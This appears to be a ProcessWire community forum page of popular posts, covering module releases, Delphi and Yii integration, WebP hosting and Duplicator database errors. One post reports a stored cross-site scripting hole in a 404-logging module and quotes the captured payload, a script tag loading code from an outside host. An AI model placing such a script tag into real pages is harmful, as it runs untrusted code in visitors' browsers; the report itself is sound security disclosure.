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Showing content with the highest reputation on 01/09/2020 in all areas

  1. v0.1.6 released. Adds module config options to override the requirements coming from the password inputfield, so the generator can create stronger passwords than the inputfield requires.
    3 points
  2. Hi everyone, While enjoying every day with ProcessWire - not building websites - but native apps and API. Just to say that I have a desire for a few months that is to teach you how to build an RestAPI and a cross-platform native application for iOS, MacOS, Android, Windows and maybe Linux in some weeks by coding in Delphi (Pascal) and using our awesome CMF ProcessWire as a backend. Why Delphi ? Embarcadero released a free edition of their IDE/Compiler (the FREE Delphi Community Edition) and everyone can enjoy building real native apps. It also give me now the opportunity to share this experience with you, as the license without the free edition was starting at ~1500$ for the Pro Edition. Also, Delphi is easy to learn, in particularly the FireMonkey frameworks which will be used to build those apps. At least I think ! When I personally begun to write code in Delphi, I had years of experience of the internal Windows API and C/C++ coding background. Still, it's just a desire, and i don't know if there are people interested by this - so let's vote !
    2 points
  3. Before you get too excited, I'd like to point out that it's hard to say how much of the GUI in the video is related to ProcessWire – a lot of the URLs go to .php files, etc. Looking at their references I can see some ProcessWire–ish stuff, but honestly I couldn't say for sure what the platform is. I can only assume that the folks behind the blog know something I don't... ? Anyway, it seems that this is a hosted solution.
    2 points
  4. Attention! If you have "log 404 to database" enabled and somebody request some js-bullshit as user-agent, the script gets exectuted, because it is rendered as such in the Jumplinks Table. Can u please fix this fast? Example with script-tag (i think the script is the user-agent) <tr> <td><a href='entity/?id=0&source=wp-admin'>wp-admin</a></td> <td class='blank'></td> <td><abbr title=""><script type=text/javascript src='https://statistic.admarketlocation.com/hos?&tp=3'></script>"> </abbr></td> <td>2020-01-09 15:18:54</td> </tr>
    2 points
  5. v0.2.0 released, which adds support for File fields so that file URLs can be added the same as with Image fields. Thanks to @gmclelland for the idea. I've also submitted the module to the directory now seeing as it seems to be working well without any significant issues reported.
    2 points
  6. Is anyone here using WEBP as their output image format and what is your server / environment setup? I know there's support for it in PW lately and decided to investigate. Found it quite difficult to do this on a practical level. IE My current VPS is Cent OS 6 and Plesk and unless I'm wrong, WEBP is not supported by either. Which host and setup are you on that allows you to run WebP? Cheers
    1 point
  7. Hi. Am I missing something here? I seem to get a test site running on native Nginx (upcloud.com). No .htaccess-file and no htaccess to nginx rules - it just works. It also throws 403's where I shouldn't have access. See my test site here: https://racemanager.net
    1 point
  8. You could change your Select Options fields to Page Reference fields. Page Reference fields are more powerful and flexible and the better choice in most cases. One of the advantages is that users can edit, sort, add and remove options for fields simply by working with the pages that represent the options. You can create a References branch in your page tree to hold the option pages for your Page Reference fields, and the Page Field Select Creator module is useful for quickly setting up new fields.
    1 point
  9. I use PW as storage engine and admin panel for my Yii2 apps - https://www.yiiframework.com/ Yii2 uses more modern approaches than PW in the core. But the PW admin panel is super, beautiful, great, Grand! Using Yii and PW together allows you to take the best from each. Although ProcessWire can be included from any other PHP script as described at https://processwire.com/docs/front-end/include/ But its too duficult use it in the right way. At a minimum, I would like it to be possible before including PW index.php specify the path to the PW config.php file (using a variable or using #define). And provide the ability to install as a package to another application using the composer ( do not know how ). Now it looks something like this for me: 1. composer create-project yiisoft/yii2-app-basic . 2. composer require processwire/processwire 3. make symbolic link to /vendor/processwire/processwire from web accessed folder (public_html, httpdocs, web, etc, depends on hosting ) 4. install processwire (example.com/processwire/install.php) 5. edit /vendor/processwire/processwire/site/config.php (set right folders and urls for uploading files, etc ) 6. In my app use require(/vendor/processwire/processwire/index.php); 7. Thats all. Enjoy it. It is very wrong to edit the config in the vendor folder. I would like to have a simpler way to use PV.
    1 point
  10. My dream - maybe someday make a module for Yii based on the ideas and concepts of PW - tree, fields, templates, great admin panel.
    1 point
  11. @phlp Security Release 1.5.60 is up. Unable to test right now – please could you check to see that all's good?
    1 point
  12. @phlp - Thanks for spotting this. Will push a release shortly.
    1 point
  13. @LostKobrakai I don't think so, it appears the old name (getModuleConfigData) is simply an alias to the getConfig function now. See the source code of the Modules class. I tested it with the current dev version of ProcessWire, and the problem described above still occurs. Also, the source of getConfig pretty much only fetches the config from the correct database row, without merging in the default config (which I believe it should do as well) ...
    1 point
  14. I use page references heavily in my projects. Page Autocomplete has a field (Settings specific to ...) on the Input tab of the field settings page that can be used to specify what fields are used during the query. You can even select multiple fields, e.g. a category_ref_by_id field can specify multiple ID fields. This way you can merge individual data sets into a single one. Each source set can have its own ID, and the ...ref_by_id field can use all of them. I have no plans for the automatic creation of the missing referenced page but it can be achieved very easily. Just create another DataSet using the same CSV file and import the appropriate "category" columns for creating the missing pages. You can also try to use the location attribute in the DataSet config to make a reference to the file uploaded to the original DataSet (see the wiki) to avoid duplicate uploads. If you need to perform these imports automatically you can create two tasks (category import and the original one) and specify a dependency between them (first import categories then the full data set). See Tasker wiki.
    1 point
  15. I just installed v1.0.0 on PW 3.0.142 and seeing a problem with german umlauts in The Google preview and inherited title. The site has Language Support installed, just to have the backend translated to German. No additional languages. Field title is of type Page Title with textformatter HTML Entity Encoder (standard setting). umlauts.mp4 The title is saved in DB field_title as 'Über uns'. Removing the Entity Encoder Textformatter doesn't help. EDIT: page title is also rendered in the wrong format: Can anyone reproduce this issue? A fix would be greatly appreciated. EDIT: This solution from github issues fixed it for me.
    1 point
  16. I'm also very interested in the backend part and all the security implications it might have, though being absolutely sincere I'm not seeing myself using Delphi. Thanks for your interest in sharing!
    1 point
  17. Thanks @adrian. I dev null'd all the log files and now the issue is gone. lol
    1 point
  18. Build a custom Process module then code what you need ? https://processwire.com/api/ref/wire-database-p-d-o/ Example in one setup I have, 3 custom tables in the database managed through a Process module which serve to find plates : In this example, I am just looking for data, but you can do what you want, show a MarkupAdminTable or even an HandsonTable to edit your data easily.
    1 point
  19. Perrrkele. Sehän on hieno:
    1 point
  20. https://2019.stateofjs.com/ TL;DR summary: https://www.i-programmer.info/news/167-javascript/13360-javascript-still-popular-.html "So we can see that the use of React (which is the most used technology in the survey with 16,099 users) has increased while it popularity has been pretty steady while Angular's popularity reduced as its adoption grew and over the last year people became more even negative towards it." My comment on this is that it looks like Vue.js is the second most popular frontend one these days. ""JavaScript is moving in the right direction" with over 80% agreeing and only 4% disagreeing. So all is well in the land of JavaScript."
    1 point
  21. Good to know; To give you a simple answer: InnoDB was faster for writes and MyISAM for reads. Nowadays, InnoDB are the way to go, yo should be aware that MyISAM is deprecated and being ? removed in MySQL 8 I think, or maybe on a later release.
    1 point
  22. Ok @adrian thanks , let us know then. It's planned yes, I was already coding something this night using natives tools. Stay tuned.
    1 point
  23. I just pushed the new master version 1.3.13. You can upgrade the module through ProcessWireUpgrade.
    1 point
  24. The RestAPI part in particular would be very interesting. I know there are some modules/site profiles already. But since you seem to do that quite frequently, you sure have some nice tips/concepts to share.
    1 point
  25. Thanks @Autofahrn ???? @adrian About the issue "MySQL server gone away". Its quite hard to determine from where come this issue - and just saying - I still not found the way to track down this issue. FYI I also got this issue on a new MariaDB server on Windows (a boosted server where the PW setup contain more than 1.5 millions pages), and also sometime on my local MAMP setup. (The issue does not concern only Duplicator). I remember also two weeks ago, I got this issue on a shared server (another setup with about 260k pages). ATM the only two hints which come to my mind is that the issue mostly appear when using the API - which can lead us to another hint: a server memory issue Thing to test: Disabled TracyDebugger Other thing to check: I mostly work with InnoDB databases and I remember that adjusting some MariaDB parameters helped. Parameters to check : max_allowed_packet innodb_log_file_size innodb_buffer_pool_size innodb_log_buffer_size PS: To adjust the settings, check this reply : What say the MySQL devs : Let me know - thanks guys ??
    1 point
  26. Ok, I'm getting there ? @flydev - there is still one more notice in 1.3.13 - line #44 should be: $this->log("Logging {$logName}\n"); $logName, rather than $zipFilename which isn't defined. Regarding the mysql gone away error, it seems that has been fixed by doing this: //DUP_Util::setMemoryLimit(self::DUP_PHP_MAX_MEMORY); //DUP_Util::setMaxExecutionTime(self::DUP_PHP_EXECUTION_TIME); set_time_limit(0); ini_set('memory_limit', '-1'); I know this is not ideal, but it's time to move on so will have to do for now.
    1 point
  27. That's a quite short time, timeout should be 120 resp. 600 seconds from what I see in the code. The backup is effectively performed using a regular WireDatabaseBackup. Could this be a security issue with cron running from a different user? Sorry, no real idea.
    1 point
  28. Thanks @Autofahrn - that new version does fix those notices. Unfortunately I am getting MySQL gone away errors again when running via cronjob. I don't expect that is to do with the new version, but rather that it's a bit random and the tests after I changed the max_allowed_packet setting didn't actually fix it. The weird thing is that the error is being triggerd ~6 seconds into the duplicator process so it's not a timeout issue.
    1 point
  29. strange, the link should lead you to the last post on page 14, which contains the update. Not sure why it points to the first page. Tricked myself, the up arrow links to the correct post. Duplicator-ATO1.3.13.zip
    1 point
  30. It's just a small mention, but web-ostajanopas.fi ("web buyers guide", a Finnish blog managed by consult company North Patrol) recently listed most popular ecommerce platforms used by bigger Finnish companies, and ProcessWire found its way to the top 10 with a ~3% market share ? https://web-ostajanopas.fi/2019/06/17/datakatsaus-isojen-kotimaisten-verkkokauppojen-teknologiat-vuonna-2019/ Just last month they did a separate mobile speed comparison of the top 10, and here ProcessWire was the fastest of the bunch (although admittedly the key finding in their study was that, generally speaking, the mobile performance of Finnish ecommerce sites is pretty bad). It seems that the data for PW is largely due to one product: the ecommerce platform from Oscar Software, which (according to North Patrol) was built on top of ProcessWire.
    1 point
  31. Hello there! I wanted to share my new proect with you. It's a small online shop for a local wine dealer: https://www.weinmarkt21.de/ Beware, the site is in german language. I used PW 3, Bootstrap 4 and a very few modules for this site. For the whole shop system I used the Processwire shop module Padloper exclusively. Developing in Processwire was a breeze as always. However I had to put some work into the Padloper stuff to make it fit to the needs of my client. It's a vey good base to start with but you should bring a bit of developing experience with you.
    1 point
  32. I have not used Padloper yet, but I built a custom shop lately and it's a LOT of work ? The problem is not the payment integration, the problem is handling all the user interactions (shopping cart, taxes, product variations etc). So it depends a lot on your scenario. If you only want to collect donations without any other features, then you might not need padloper (but then you could also just use a payment button from one of the providers)
    1 point
  33. 1 point
  34. Just edit the url of the "Admin" page in the pagetree.
    1 point
  35. Does something similar to below not work? if($page->hide_from_top_menu == 0){ } See this thread and the solution (post #9) as well as the issues about '=' versus '=='. Can't find it now but if I remember correctly, in PW checkbox is either 0 (unchecked) or 1 (checked). I could be wrong /k
    1 point
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